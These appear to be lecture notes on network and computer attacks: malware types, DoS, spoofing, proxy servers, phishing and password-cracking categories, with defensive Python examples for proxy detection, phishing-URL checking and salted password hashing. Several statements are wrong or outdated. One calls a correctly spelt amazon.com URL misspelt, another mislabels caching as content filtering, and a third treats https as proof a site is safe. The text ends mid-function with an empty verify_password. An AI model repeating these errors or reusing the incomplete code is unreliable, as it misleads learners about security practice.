NETWORK AND COMPUTER ATTACKS
Many people rely on the Internet for many of their professional, social and
personal activities. But there are also people who attempt to damage our
Internet-connected computers, violate our privacy and render Internet services
inoperable.
Given the frequency and variety of existing attacks as well as the threat of new
and more destructive future attacks, network security has become a central
topic in the field of computer networking.
How are computer networks vulnerable? What are some of the more
prevalent types of attacks today?
Malware – short for malicious software, which is specifically designed to
disrupt, damage, or gain unauthorized access to a computer system. Much of the
malware out there today is self-replicating: once it infects one host, from
that host it seeks entry into other hosts over the Internet, and from the newly
infected hosts, it seeks entry into yet more hosts. In this manner,
self-replicating malware can spread exponentially fast.
Virus – A malware which requires some form of user’s interaction to infect the
user’s device. The classic example is an e-mail attachment containing malicious
executable code. If a user receives and opens such an attachment, the user
inadvertently runs the malware on the device.
Worm – A malware which can enter a device without any explicit user
interaction. For example, a user may be running a vulnerable network
application to which an attacker can send malware. In some cases, without any
user intervention, the application may accept the malware from the Internet and
run it, creating a worm.
Botnet – A network of private computers infected with malicious software and
controlled as a group without the owners’ knowledge, e.g. to send spam.
DoS (Denial of Service) – A DoS attack renders a network, host, or other piece
of infrastructure unusable by legitimate users. Most Internet DoS attacks fall
into one of three categories:
• Vulnerability attack: This involves sending a few well-crafted messages to a
vulnerable application or operating system running on a targeted host. If the
right sequence of packets is sent to a vulnerable application or operating
system, the service can stop or, worse, the host can crash.
• Bandwidth flooding: The attacker sends a deluge of packets to the targeted
host—so many packets that the target’s access link becomes clogged,
preventing legitimate packets from reaching the server.
• Connection flooding: The attacker establishes a large number of half-open or
fully open TCP connections at the target host. The host can become so bogged
down with these bogus connections that it stops accepting legitimate
connections.
DDoS (Distributed DoS) – DDoS is a type of DoS attack where multiple
compromised systems are used to target a single system, causing a Denial of
Service (DoS). DDoS attacks leveraging botnets with thousands of compromised
hosts are a common occurrence today. DDoS attacks are much harder to detect and
defend against than a DoS attack from a single host.
Packet sniffer – A passive receiver that records a copy of every packet that
flies by is called a packet sniffer. By placing a passive receiver in the vicinity of
the wireless transmitter, that receiver can obtain a copy of every packet that is
transmitted! These packets can contain all kinds of sensitive information,
including passwords, social security numbers, trade secrets, and private
personal messages. Some of the best defenses against packet sniffing involve
cryptography.
IP Spoofing – The ability to inject packets into the Internet with a false source
address is known as IP spoofing, and is but one of many ways in which one
user can masquerade as another user. To solve this problem, we will need end-
point authentication, that is, a mechanism that will allow us to determine with
certainty if a message originates from where we think it does.
Man-in-the-Middle Attack – As the name indicates, a man-in-the-middle attack
occurs when someone between you and the person with whom you are
communicating is actively monitoring, capturing, and controlling your
communication transparently. For example, the attacker can re-route a data
exchange. When computers are communicating at low levels of the network
layer, the computers might not be able to determine with whom they are
exchanging data.
Compromised-Key Attack – A key is a secret code or number necessary to
interpret secured information. Although obtaining a key is a difficult and
resource-intensive process for an attacker, it is possible. After an attacker
obtains a key, that key is referred to as a compromised key. An attacker uses
the compromised key to gain access to a secured communication without the
sender or receiver being aware of the attack.
Phishing – The fraudulent practice of sending emails purporting to be from
reputable companies in order to induce individuals to reveal personal
information, such as passwords and credit card numbers.
DNS spoofing – Also referred to as DNS cache poisoning, this is a form of
attack in which corrupt Domain Name System data is introduced into the DNS
resolver's cache, causing the resolver to return an incorrect IP address.
Rootkit – Rootkits are stealthy packages designed to gain administrative
rights and access to a network device. Once installed, hackers have complete
and unrestricted access to the device and can therefore execute any action,
including spying on users or stealing confidential data, without hindrance.
Learn more about network attacks:
There is more to learn about network attacks.
Zeus Malware: Variants, Methods and History:
Zeus, also known as Zbot, is a malware package that uses a client/server
model. Hackers use the Zeus malware to create massive botnets. The main
purpose of Zeus is to help hackers gain unauthorized access to financial
systems by stealing credentials, banking information and financial data. The
stolen data is then sent back to the attackers through the Zeus Command and
Control (C&C) server.
Zeus has infected over 3 million computers in the USA, and has compromised
major organizations like NASA and the Bank of America.
Cobalt Strike: White Hat Hacker Powerhouse in the Wrong Hands
Cobalt Strike is a commercial penetration testing tool. This tool gives
security testers access to a large variety of attack capabilities. It can be
used to execute spear phishing and gain unauthorized access to systems. It
can also simulate a variety of malware and other advanced threat tactics.
While Cobalt Strike is a legitimate tool used by ethical hackers, some cyber
criminals obtain the trial version and crack its software protection, or even
gain access to a commercial copy of the software.
FTCode Ransomware: Distribution, Anatomy and Protection
FTCode is a type of ransomware, designed to encrypt data and force victims to
pay a ransom for a decryption key. The code is written in PowerShell, meaning
that it can encrypt files on a Windows device without downloading any other
components. FTCode loads its executable code only into memory, without saving
it to disk, to prevent detection by antivirus. The FTCode ransomware is
distributed through spam emails containing an infected Word template in
Italian.
Mimikatz: World's Most Dangerous Password Stealing Platform
Mimikatz is an open-source tool initially developed by ethical hacker
Benjamin Delpy to demonstrate a flaw in Microsoft's authentication protocols.
In other words, the tool steals passwords. It runs on Windows and enables
users to extract Kerberos tickets and other authentication tokens from the
machine. Some of the more significant attacks facilitated by Mimikatz include
Pass-the-Hash, Kerberos Golden Ticket, Pass the Key, and Pass-the-Ticket.
Understanding Privilege Escalation and 5 Common Attack Techniques
Privilege escalation is a common method for gaining unauthorized access to
systems. Hackers start privilege escalation by finding weak points in an
organization's defenses and gaining access to a system. Usually, the first
point of penetration will not grant attackers the necessary level of access
or data. They will continue with privilege escalation to gain permissions or
access to additional, more sensitive systems.
UNIT – II
A proxy server is a server that acts as an intermediary between the requests
made by clients and a particular server for some services or resources. There
are different types of proxy servers available, which are put into use
according to the purpose of the request made by the clients to the servers.
The basic purpose of proxy servers is to avoid a direct connection between
Internet clients and Internet resources. The proxy server also prevents
identification of the client's IP address when the client makes a request to
any other server.
 Internet client and Internet resources: For Internet clients, proxy
servers also act as a shield for an internal network against requests coming
from a client to access data stored on the server. It keeps the original IP
address of the node hidden while accessing data from that server.
 Protects true host identity: In this method, outgoing traffic appears to
come from the proxy server rather than from the client's own Internet
navigation. It must be configured for the specific application, such as HTTPS
or FTP. For example, organizations can use a proxy to observe the traffic of
their employees so that work gets done efficiently. It can also be used to
keep a check on any kind of leakage of highly confidential data. Some also
use it to increase their website's rank.
Need Of Private Proxy:
1. Defeat hackers: To protect an organization's data from malicious use,
passwords are used and different architectures are set up, but there may
still be a possibility that this information can be hacked if the IP address
is easily accessible. To prevent such misuse of data, proxy servers are set
up so that original IP addresses cannot be tracked; instead, data appears to
come from a different IP address.
2. Filtering of Content: By caching the content of websites, a proxy speeds
up access to data that is accessed very often.
3. Examine packet headers and payloads: Payloads and packet headers of the
requests made by user nodes in the internal network to access social websites
can be easily tracked and restricted.
4. To control internet usage of employees and children: Here the proxy server
is used to control and monitor how employees or kids use the internet.
Organizations use it to deny access to a specific website and instead
redirect you to a note asking you to refrain from looking at such sites on
the company network.
5. Bandwidth savings and improved speeds: A good proxy server helps
organizations get better overall network performance.
6. Privacy benefits: Proxy servers are used to browse the internet more
privately. The proxy changes the IP address and hides identifying information
that the web request contains.
7. Security: A proxy server can be used to encrypt your web requests to keep
prying eyes from reading your transactions, which provides a high level of
security.
Types Of Proxy Server
1. Reverse Proxy Server: The job of a reverse proxy server is to listen to the
requests made by clients and redirect each one to the particular web server,
among several, that should handle it.
Example – It listens for website connections on TCP port 80. Such servers are
normally placed in a demilitarized zone (DMZ) for publicly accessible
services, and the reverse proxy also protects the true identity of the host.
Moreover, it is transparent to external users, who cannot identify the actual
number of internal servers. So it is the prime duty of the reverse proxy to
redirect the flow depending upon the configuration of the internal servers.
A request that has to pass through a private network protected by firewalls
needs a proxy server that is not bound by any of the local policies; such
requests from clients are completed using reverse proxy servers. A reverse
proxy is also used to restrict client access to confidential data residing
on particular servers.
2. Web Proxy Server: A web proxy forwards HTTP requests; only the URL is
passed instead of a path. The request is sent to the proxy, and the proxy
server responds. Examples: Apache, HAProxy.
3. Anonymous Proxy Server: This type of proxy server does not reveal the
original IP address. These servers are detectable as proxies but still provide
reasonable anonymity to the client device.
4. High Anonymity Proxy: This proxy server neither reveals the original IP
address nor allows itself to be detected as a proxy server.
5. Transparent Proxy: This type of proxy server does not provide any anonymity
to the client; instead, the original IP address can be easily detected through
it. It is put to use as a cache for websites. A transparent proxy combined
with a gateway results in a proxy server where the connection requests sent by
the client are redirected at the IP level. Redirection occurs without any
proxy configuration on the client. HTTP headers seen on the server side can
easily reveal this redirection.
6. CGI Proxy: A CGI proxy server is developed to make websites more
accessible. It accepts requests for target URLs through a web form and, after
processing, returns the result to the web browser. It is less popular than
alternatives such as VPNs because of privacy concerns, but it still receives a
lot of requests. Its usage has declined because of the excessive traffic it
can cause to a website after passing the local filtering, which leads to
damage to the organization.
7. Suffix Proxy: A suffix proxy server basically appends the name of the
proxy to the URL. This type of proxy does not preserve any higher level of
anonymity. It is used for bypassing web filters. It is easy to use and can be
easily implemented, but is used less because of the growing number of web
filters that recognize it.
8. Distorting Proxy: These proxy servers deliberately present an incorrect
original IP address for the client while identifying themselves as a proxy
server. HTTP headers are used to keep the real client IP address confidential.
9. Tor Onion Proxy: This server aims at online anonymity for the user's
personal information. It routes the traffic through various networks present
worldwide to make it difficult to track the user's address and to prevent
attacks on the user's anonymous activities. It makes it difficult for anyone
who is trying to trace the original address. In this type of routing, the
information is encrypted in multiple layers. At each hop one layer is
decrypted, and only at the destination is the original content recovered.
This software is open-source and free of cost to use.
10. I2P Anonymous Proxy: It uses encryption to hide all communications at
various levels. The encrypted data is then relayed through various network
routers present at different locations, and thus I2P is a fully distributed
proxy. This software is free of cost and open source to use, and it also
resists censorship.
11. DNS Proxy: A DNS proxy takes requests in the form of DNS queries and
forwards them to the domain server, where they can also be cached; moreover,
the flow of requests can be redirected.
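The transparent, anonymous, distorting and high-anonymity categories above differ in what an origin server can see in the request headers. The following added example (not code from these notes) classifies an incoming request on the server side by those headers: the header names Via, X-Forwarded-For, X-Real-IP and Forwarded are the real ones in common use, while the classification rules and the sample addresses are this example's own assumptions.

```python
"""
Classify the kind of proxy a request came through, as seen by the origin
server (added example).

  transparent    - a proxy identifies itself and forwards a plausible client IP
  anonymous      - a proxy identifies itself but withholds the client IP
  distorting     - a proxy forwards an address that cannot be a real client
  none detected  - no proxy headers at all: a direct client, or a high
                   anonymity proxy, which the server cannot tell apart
"""
import ipaddress
from typing import Dict, Optional

# Any of these headers reveals that an intermediary handled the request.
PROXY_MARKERS = ("via", "forwarded", "x-forwarded-for", "x-real-ip", "proxy-connection")


def _lower(headers: Dict[str, str]) -> Dict[str, str]:
    # HTTP header names are case-insensitive.
    return {k.lower(): v for k, v in headers.items()}


def _forwarded_client_addr(headers: Dict[str, str]) -> Optional[str]:
    """Return the address the proxy claims the request originated from, if any."""
    h = _lower(headers)
    if "x-forwarded-for" in h:
        # Comma-separated chain; the leftmost entry is the original client.
        return h["x-forwarded-for"].split(",")[0].strip()
    if "x-real-ip" in h:
        return h["x-real-ip"].strip()
    if "forwarded" in h:
        # RFC 7239 form, e.g. 'for=203.0.113.9;proto=https'.  Port suffixes
        # (for="[2001:db8::1]:4711") are not handled in this small example.
        for part in h["forwarded"].replace(";", ",").split(","):
            name, _, value = part.strip().partition("=")
            if name.lower() == "for":
                return value.strip().strip('"').strip("[]")
    return None


def _is_plausible_client_ip(addr: str) -> bool:
    """A real Internet client has a globally routable address."""
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:
        return False  # not an IP address at all


def classify_proxy(headers: Dict[str, str]) -> str:
    """Map the headers seen by the origin server to one of the proxy categories."""
    h = _lower(headers)
    if not any(marker in h for marker in PROXY_MARKERS):
        return "none detected (direct client or high anonymity proxy)"
    addr = _forwarded_client_addr(headers)
    if addr is None:
        return "anonymous"      # proxy announced itself (e.g. Via) but hid the client
    if _is_plausible_client_ip(addr):
        return "transparent"    # proxy passed the real-looking client address on
    return "distorting"         # private, loopback or bogus address presented as client


if __name__ == "__main__":
    # Constructed sample requests; 8.8.8.8 stands in for a public client address.
    samples = {
        "direct": {"Host": "shop.example", "User-Agent": "demo"},
        "transparent": {"Via": "1.1 proxy.example", "X-Forwarded-For": "8.8.8.8, 10.0.0.2"},
        "anonymous": {"Via": "1.1 proxy.example"},
        "distorting": {"Via": "1.1 proxy.example", "X-Forwarded-For": "10.0.0.1"},
    }
    for name, hdrs in samples.items():
        print(f"{name:12s} -> {classify_proxy(hdrs)}")
```

Only a proxy that leaks the headers can be classified this way; a high-anonymity proxy is indistinguishable from a direct client on the server side, which is exactly the property the notes describe.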
How Does The Proxy Server Operate?
Every computer has a unique IP address which it uses to communicate with other
nodes. Similarly, the proxy server has its own IP address, which your computer
knows. When a web request is sent, your request goes to the proxy server
first. The proxy sends a request on your behalf to the internet, then collects
the data and makes it available to you. A proxy can change your IP address, so
the web server will be unable to work out your location in the world. It also
protects data from being hacked. Moreover, it can block some web pages as
well.
Disadvantages of Proxy Server
1. Proxy server risks: A free proxy service does not invest much in backend
hardware or encryption. This results in performance issues and potential data
security issues. If you use a "free" proxy server, proceed very carefully;
some of them might steal your credit card numbers.
2. Browsing history log: The proxy server stores your original IP address and
web request information, possibly in unencrypted form, and saves it locally.
Always check whether your proxy server logs and saves that data, and what
kind of retention or law enforcement cooperation policies it follows while
saving data.
3. No encryption: No encryption means you are sending your requests as plain
text. Anyone will be able to pull usernames, passwords and account information
easily. Check that the proxy provides full encryption whenever you use it.
Phishing
Phishing is one type of cyber attack. Phishing got its name from "phish",
meaning fish. It is a common practice to put out bait for the fish to get
trapped, and phishing works similarly. It is an unethical way to dupe the user
or victim into clicking on harmful sites. The attacker crafts the harmful site
in such a way that the victim believes it to be an authentic site, thus
falling prey to it. The most common mode of phishing is sending spam emails
that appear to be authentic and thus taking all credentials from the victim.
The main motive of the attacker behind phishing is to gain confidential
information like
 Password
 Credit card details
 Social security numbers
 Date of birth
The attacker uses this information to further target the user, impersonate the
user and cause data theft. The most common type of phishing attack happens
through email. Phishing victims are tricked into revealing information that
they think should be kept private. The original logo of the company is used
in the email to make the user believe that it is indeed the original email.
But if we look carefully into the details, we will find that the URL or web
address is not authentic. Let's understand this concept with an example.
In this example, most people believe it’s YouTube just by looking at the red
icon. So, thinking of YouTube as a secure platform, the users click on the
extension without being suspicious about it. But if we look carefully, we can see
the URL is supertube.com and not youtube.com. Secondly, YouTube never
asks to add extensions for watching any video. The third thing is the extension
name itself is weird enough to raise doubt about its credibility.
How Does Phishing Occur?
Below are the ways through which phishing generally occurs. Any of the
techniques mentioned below can lead the user into a phishing attack.
 Clicking on an unknown file or attachment: Here, the attacker deliberately
sends a mysterious file to the victim; as the victim opens the file, either
malware is injected into his system or it prompts the user to enter
confidential data.
 Using an open or free wifi hotspot: This is a very simple way to obtain
confidential information from the user by luring him with free wifi. The wifi
owner can observe and control the user's data without the user knowing it.
 Responding to social media requests: This commonly involves social
engineering. Accepting unknown friend requests and then, by mistake, leaking
secret data is the most common mistake made by naive users.
 Clicking on unauthenticated links or ads: Unauthenticated links are
deliberately crafted to lead to a phished website that tricks the user into
typing confidential data.
Types of Phishing Attacks
There are several types of phishing attacks; some of them are mentioned
below. The attacks mentioned below are very common and the ones most used by
attackers.
 Email Phishing: The most common type, where users are tricked into
clicking unverified spam emails and leaking secret data. Hackers impersonate
a legitimate identity and send emails to a mass of victims. Generally, the
goal of the attacker is to get personal details like bank details, credit
card numbers, user IDs and passwords for some online shopping website, to
install malware, etc. After getting the personal information, they use it to
steal money from the user's account or harm the target system.
 Spear Phishing: In a spear phishing attack, a particular user
(organization or individual) is targeted. In this method, the attacker first
gathers full information about the target and then sends malicious emails to
his/her inbox to trap him into typing confidential data. For example, the
attacker targets someone (let's assume an employee from the finance
department of some organization). Then the attacker pretends to be the
manager of that employee and requests personal information or a transfer of
a large sum of money. It is the most successful attack.
 Whaling: Whaling is just like spear phishing, but the main target is the
head of the company, like the CEO, CFO, etc. A high-pressure email is sent to
such executives so that they don't have much time to think, and they
therefore fall prey to phishing.
 Smishing: In this type of phishing attack, the medium of phishing attack
is SMS. Smishing works similarly to email phishing. SMS texts are sent to
victims containing links to phished websites or invite the victims to call a
phone number or to contact the sender using the given email. The victim is
then invited to enter their personal information like bank details, credit card
information, user id/ password, etc. Then using this information the attacker
harms the victim.
 Vishing: Vishing is also known as voice phishing. In this method, the
attacker calls the victim using modern caller id spoofing to convince the
victim that the call is from a trusted source. Attackers also use IVR to make it
difficult for legal authorities to trace the attacker. It is generally used to steal
credit card numbers or confidential data from the victim.
 Clone Phishing: In this type of phishing attack, the attacker copies an
email message that was sent from a trusted source and then alters it by
adding a link that redirects the victim to a malicious or fake website. The
attacker then sends this mail to a larger number of users and waits to see
who clicks on the attachment or link that was sent in the email. It spreads
through the contacts of the user who has clicked on the attachment.
Impact of Phishing
These are the impacts on a user affected by a phishing attack. Each person is
affected differently, but these are some of the common impacts that happen to
the majority of people.
 Financial Loss: Phishing attacks often target financial information, such
as credit card numbers and bank account login credentials. This information
can be used to steal money or make unauthorized purchases, leading to
significant financial losses.
 Identity Theft: Phishing attacks can also steal personal information, such
as Social Security numbers and date of birth, which can be used to steal an
individual’s identity and cause long-term harm.
 Damage to Reputation: Organizations that fall victim to phishing attacks
can suffer damage to their reputation, as customers and clients may lose
trust in the company’s ability to protect their information.
 Disruption to Business Operations: Phishing attacks can also cause
significant disruption to business operations, as employees may have their
email accounts or computers compromised, leading to lost productivity and
data.
 Spread of Malware: Phishing attacks often use attachments or links to
deliver malware, which can infect a victim’s computer or network and cause
further harm.
Signs of Phishing
It is very important to be able to identify the signs of a phishing attack in
order to protect against its harmful effects. These signs help the user
protect their data and information from hackers. Here are some signs to look
out for:
 Suspicious email addresses: Phishing emails often use fake email
addresses that appear to be from a trusted source, but are actually
controlled by the attacker. Check the email address carefully and look for
slight variations or misspellings that may indicate a fake address.
 Urgent requests for personal information: Phishing attacks often try to
create a sense of urgency in order to trick victims into providing personal
information quickly. Be cautious of emails or messages that ask for personal
information and make sure to verify the authenticity of the request before
providing any information.
 Poor grammar and spelling: Phishing attacks are often created quickly
and carelessly, and may contain poor grammar and spelling errors. These
mistakes can indicate that the email or message is not legitimate.
 Requests for sensitive information: Phishing attacks often try to steal
sensitive information, such as login credentials and financial information. Be
cautious of emails or messages that ask for sensitive information and verify
the authenticity of the request before providing any information.
 Unusual links or attachments: Phishing attacks often use links or
attachments to deliver malware or redirect victims to fake websites. Be
cautious of links or attachments in emails or messages, especially from
unknown or untrusted sources.
 Strange URLs: Phishing attacks often use fake websites that look similar
to the real ones, but have slightly different URLs. Look for strange URLs or
slight variations in the URL that may indicate a fake website.
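The "suspicious email addresses" and "strange URLs" signs above, together with the advice on this page to check for https:// and to read the domain name (supertube.com is not youtube.com, and a misspelt amazon is not Amazon), can be turned into a mechanical check applied to a link before it is clicked. The following is an added example, not code from these notes; the trusted-domain list, the look-alike character table and the sample links are constructed for it, and the registrable domain is approximated by the last two labels rather than looked up in the Public Suffix List.

```python
"""
Check a URL the way the notes advise a reader to (added example):
scheme, the registrable domain, brand names hidden inside unrelated
domains, and typo / look-alike-character imitations of trusted domains.
"""
from typing import List, Tuple
from urllib.parse import urlsplit

TRUSTED = {"youtube.com", "amazon.com", "google.com", "paypal.com"}  # constructed list

# Characters swapped in because they look alike (amaz0n, paypa1, g00gle).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
MULTI = [("rn", "m"), ("vv", "w"), ("cl", "d")]  # two letters that read as one


def _normalize(label: str) -> str:
    s = label.lower().translate(HOMOGLYPHS)
    for bad, good in MULTI:
        s = s.replace(bad, good)
    return s


def _levenshtein(a: str, b: str) -> int:
    """Edit distance; small values mean a typo-squat such as 'goggle.com'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Approximation: the last two DNS labels (assumption; no Public Suffix List)."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:])


def check_url(url: str) -> Tuple[str, List[str]]:
    """Return (verdict, reasons); verdict is 'trusted', 'suspicious' or 'unknown'."""
    reasons: List[str] = []
    u = urlsplit(url if "://" in url else "http://" + url)
    host = (u.hostname or "").lower()
    if not host:
        return "suspicious", ["no hostname in URL"]
    if u.scheme != "https":
        reasons.append("not https: data sent to this site is not encrypted")
    if "@" in u.netloc:
        reasons.append("text before '@' disguises the real host")
    reg = registrable_domain(host)
    if reg in TRUSTED:
        # Right domain; still suspicious if the scheme or form is off.
        return ("trusted" if not reasons else "suspicious"), reasons
    norm_reg = _normalize(reg)
    labels = host.split(".")
    for trusted in sorted(TRUSTED):
        brand = trusted.split(".")[0]
        if norm_reg == trusted or _levenshtein(norm_reg.split(".")[0], brand) <= 2:
            reasons.append(f"'{reg}' imitates {trusted} (typo or look-alike characters)")
        elif any(brand in lab for lab in labels):
            # e.g. amazon.com.evil.test: the brand is a subdomain of someone else.
            reasons.append(f"brand name '{brand}' used inside unrelated domain '{reg}'")
    if reasons:
        return "suspicious", reasons
    return "unknown", [f"'{reg}' is not a known domain; do not trust it because of its logo"]


if __name__ == "__main__":
    # Constructed sample links mirroring the cases discussed in the notes.
    for link in ("https://www.youtube.com/watch?v=demo",
                 "https://supertube.com/watch?v=demo",
                 "http://www.amazon.com/order_id=23",
                 "https://www.amaz0n.com/login",
                 "https://amazon.com.evil.test/signin"):
        verdict, why = check_url(link)
        print(f"{verdict:10s} {link}")
        for r in why:
            print("           -", r)
```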
How To Stay Protected Against Phishing?
Until now, we have seen how vulnerable a user becomes due to phishing. But
with proper precautions, one can avoid such scams. Below are the ways to
protect users against phishing attacks:
 Authorized Source: Download software from authorized sources only
where you have trust.
 Confidentiality: Never share your private details with unknown links and
keep your data safe from hackers.
 Check URL: Always check the URL of websites to prevent any such attack.
It will help you not get trapped in phishing attacks.
 Avoid replying to suspicious things: If you receive an email from a
known source but that email looks suspicious, then contact the source with a
new email rather than using the reply option.
 Phishing Detection Tool: Use phishing-detecting tools to monitor the
websites that are crafted and contain unauthentic content.
 Try to avoid free wifi: Avoid using free Wifi, it will lead to threats and
Phishing.
 Keep your system updated: It’s better to keep your system always
updated to protect from different types of Phishing Attacks.
 Keep the firewall of the system ON: Keeping ON the firewalls helps you
in filtering ambiguous and suspicious data and only authenticated data will
reach to you.
How To Distinguish between a Fake Website and a Real Website?
It is very important nowadays to be able to tell fake websites apart from real
ones. Here are some of the ways through which you can identify which websites
are real and which ones are fake. To distinguish between a fake website and a
real website, always remember the following points:
 Check the URL of the website: A good and legal website always uses a
secure medium to protect you from online threats. So, when you first see a
website link, always check the beginning of the address. If the address
starts with https:// then the connection is secure, because the “s” in https://
denotes secure, which means the website uses encryption to transfer data,
protecting it from hackers. If a website uses http:// then the website is not
guaranteed to be safe. So, it is advised not to visit HTTP websites as they
are not secure.
 Check the domain name of the website: Attackers generally create a
website whose address mimics that of a large brand or company, such as
www.amazon.com/order_id=23. If we look closely, we can see that it’s a fake
website because the spelling of Amazon in the address is wrong. So it’s a
phished website; be careful with such types of websites.
 Look for site design: If you open a website from a link, then pay
attention to the design of the site. Although the attacker tries to imitate the
original one as much as possible, they still fall short in some places. So, if you
see something off, that might be a sign of a fake website. For example,
when www.sugarcube.com/facebook is opened, the page that loads is a clone
of the actual Facebook page, but it is a fake website. The original link to
Facebook is www.facebook.com.
 Check for the available web pages: A fake website does not contain all
the web pages that are present in the original website. So when you
encounter a suspected fake website, open the options (links) present on it.
If they only display a login page, then the website is fake.
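The URL and domain checks listed above can be automated. The following is an added example, not code from the original notes: it flags the red flags just described (a non-HTTPS scheme, a brand name that appears in a subdomain or path instead of the registered domain, digit-for-letter look-alikes such as amaz0n, and near-miss spellings). The allowlist KNOWN_HOSTS, the BRANDS set, the HOMOGLYPHS table and the sample URLs are assumptions constructed for this example; a real deployment would load its own lists.

```python
from urllib.parse import urlsplit

# Constructed allowlist of legitimate hostnames and the brand words they carry
# (assumption for this example; a real deployment would use its own list).
KNOWN_HOSTS = {"www.amazon.com", "www.facebook.com"}
BRANDS = {"amazon", "facebook"}

# Digit-for-letter substitutions commonly seen in look-alike domain names.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic-programming form)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_url(url):
    """Return a list of warnings for a URL; an empty list means no red flag was found."""
    warnings = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        warnings.append("not https")
    if host in KNOWN_HOSTS:
        return warnings
    labels = host.split(".")
    # The registered name is the label left of the TLD (e.g. "amaz0n" in
    # www.amaz0n.com). This simplification ignores multi-label suffixes like .co.uk.
    core = labels[-2] if len(labels) >= 2 else host
    for brand in BRANDS:
        if brand in labels[:-2] or brand in parts.path.lower():
            # www.facebook.com.evil.net or www.sugarcube.com/facebook
            warnings.append("'%s' appears outside the registered domain" % brand)
        elif core == brand:
            warnings.append("registered domain is '%s' but host is not on the allowlist" % brand)
        elif core.translate(HOMOGLYPHS) == brand:
            warnings.append("'%s' is a digit-substitution look-alike of '%s'" % (core, brand))
        elif brand in core or levenshtein(core, brand) <= 2:
            warnings.append("'%s' is a near-miss of '%s'" % (core, brand))
    return warnings
```

Run check_url() on each link before it is followed; anything it returns is a reason to stop and verify the address by another channel, exactly as the list above advises.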
Anti-Phishing Tools
Well, it’s essential to use Anti-Phishing tools to detect phishing attacks. Here
are some of the most popular and effective anti-phishing tools available:
 Anti-Phishing Domain Advisor (APDA): A browser extension that
warns users when they visit a phishing website. It uses a database of known
phishing sites and provides real-time protection against new threats.
 PhishTank: A community-driven website that collects and verifies reports
of phishing attacks. Users can submit phishing reports and check the status
of suspicious websites.
 Webroot Anti-Phishing: A browser extension that uses machine
learning algorithms to identify and block phishing websites. It provides real-
time protection and integrates with other security tools.
 Malwarebytes Anti-Phishing: A security tool that protects against
phishing attacks by detecting and blocking suspicious websites. It uses a
combination of machine learning and signature-based detection to provide
real-time protection.
 Kaspersky Anti-Phishing: A browser extension that provides real-time
protection against phishing attacks. It uses a database of known phishing
sites and integrates with other security tools to provide comprehensive
protection.
Password cracking is one of the essential phases of the hacking
framework. Password cracking is a way to recover passwords from the
information stored on or sent by a PC or mainframe. The motivation behind
password cracking may be to help a user recover from a failed authentication
or a forgotten password, to let system administrators check for easily
crackable weak passwords as a preventive measure, or to let an attacker use
this process to gain unauthorized system access.
Types of Password Attacks :
Password cracking is carried out in both legitimate and illegitimate contexts,
for instance to protect a system from unauthorized access or to recover a
password the user had forgotten. The attack arrangement depends on the
attacker’s activities, which are ordinarily one of the following four types:
1. Non-Electronic Attacks –
This is most likely the hacker’s first go-to for acquiring the target system
password. These sorts of password cracking attacks don’t need any
specialized skill or knowledge about hacking or misuse of systems.
For this reason, this is a non-electronic attack. A few strategies used for
carrying out these attacks are social engineering, dumpster diving,
shoulder surfing, and so forth.
2. Active Online Attacks –
This is perhaps the most straightforward approach to acquire unauthorized
administrator-level access to a mainframe. To crack the passwords, a hacker
needs to communicate with the target machines, as this is required to test
password access. A few techniques used for carrying out these attacks
are dictionary attacks, brute-forcing, password guessing, hash injection,
phishing, LLMNR/NBT-NS Poisoning, using Trojans/spyware/keyloggers,
and so forth.
3. Passive Online Attacks –
A passive attack is a deliberate attack that doesn’t bring about any change
to the system. In these sorts of attacks, the hacker doesn’t have to interact
with the system. Instead, he/she passively monitors or records the data
passing over the communication channel to and from the mainframe. The
attacker then uses the captured data to break into the system.
Techniques used to perform passive online attacks include replay attacks,
wire-sniffing, man-in-the-middle attacks, and so on.
4. Offline Attacks –
Offline attacks refer to password attacks where an attacker
attempts to recover clear-text passwords from a password hash
dump. These sorts of attacks are often tedious but can be effective, as
password hashes can be cracked due to their smaller keyspace and
shorter length. Attackers use precomputed hashes from rainbow
tables to perform offline and distributed network attacks.
Some of the best practices for protecting against password cracking include :
1. Perform information security audits to monitor and track password attacks.
2. Do not reuse the same password when changing passwords.
3. Do not share passwords.
4. Do not use passwords that can be found in a dictionary.
5. Do not use clear-text protocols or protocols with weak encryption.
6. Set the password change policy to 30 days.
7. Do not store passwords in an insecure location.
8. Do not use any mainframe’s or PC’s default passwords.
9. Unpatched computers can have passwords reset during buffer overflow or
Denial of Service attacks. Keep the system updated.
10. Enable account lockout with a specific number of attempts, counter
reset time, and lockout duration. One of the best ways to manage passwords in
organizations is to set up automated password reset.
11. Ensure that the computer or server’s BIOS is protected with a password,
particularly on devices that are exposed to physical threats, for instance
mainframes and PCs.
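Practices 2, 4 and 10 above, and the reason offline rainbow-table attacks fail against salted hashes, can be shown in code. The following is an added example, not code from the original notes: a salted PBKDF2 password store, a policy check that rejects dictionary-based and reused passwords, and an account-lockout class with the three parameters the list names (attempt limit, counter reset window, lockout duration). WORDLIST, PBKDF2_ITERATIONS and the default policy numbers are assumptions chosen for the example; timestamps are plain seconds so the logic can be exercised without a clock.

```python
import hashlib
import hmac
import os

# Constructed sample of dictionary words (assumption for this example; a real
# check uses a full wordlist).
WORDLIST = {"password", "welcome", "letmein", "qwerty", "admin"}
PBKDF2_ITERATIONS = 200_000  # assumption; tune to the deployment's hardware


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; a per-user random salt defeats precomputed
    rainbow tables because each hash has to be attacked separately."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    """Constant-time comparison so the check leaks nothing through timing."""
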